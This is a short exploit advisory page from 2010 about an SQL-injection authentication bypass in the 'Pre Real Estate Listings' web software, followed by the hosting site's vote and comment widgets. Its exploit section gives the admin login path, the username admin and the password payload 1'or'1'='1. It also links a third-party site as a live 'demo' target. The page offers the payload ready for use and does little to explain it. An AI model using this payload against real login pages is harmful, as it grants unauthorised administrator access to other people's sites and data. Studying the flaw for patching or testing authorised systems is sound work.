Pre Real Estate Listings SQL Bypass Vulnerability

2010.11.16

Credit: Cru3l.b0y

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

In The Name Of GOD
[+] Exploit Title: Pre Real Estate Listings SQL Bypass Vulnerability
[+] Date: 2010-11-14
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/prereal.asp
[+] Price : 55.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
go to /manager/index.php
Username : admin
Password : 1'or'1'='1
[+] Demo: http://hostnomi.net/int/manager/index.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Pre Real Estate Listings SQL Bypass Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.